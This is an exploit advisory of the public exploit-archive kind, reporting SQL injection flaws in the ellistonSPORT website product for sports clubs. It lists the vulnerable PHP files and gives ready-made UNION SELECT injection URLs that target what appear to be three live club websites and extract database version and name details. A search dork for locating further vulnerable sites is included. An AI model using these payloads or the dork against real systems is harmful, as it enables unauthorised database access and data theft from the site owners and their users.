[o] ellistonSPORT Multiple SQL Injection Vulnerability
Software : ellistonSPORT
Vendor : http://ellistonsport.com/
Demo : http://demo.ellistonsport.com/index.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Description
ellistonSPORT is a leading online service providing
professionally designed, easy to update websites for sports clubs and
teams around the world.
[o] Vulnerable file
showPlayer.php
showPage.php
showNews.php
[o] Exploit
http://localhost/[path]/showPlayer.php?id=[SQL]
http://localhost/[path]/showPage.php?id=[SQL]
http://localhost/[path]/showNews.php?id=[SQL]
[o] Proof of Concept
http://garndiffaithrfc.com/showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,database()--
http://www.rbscrusaders.com/showPage.php?id=10+AND+1=2+UNION+SELECT+1,version(),database(),4--
http://www.romafc.co.uk/showNews.php?id=363+AND+1=2+UNION+SELECT+1,version(),database(),4,5,6,7--
[o] Dork
"Powered by ellistonSPORT"
[o] Notes
this is a private script and all target are in one IP address.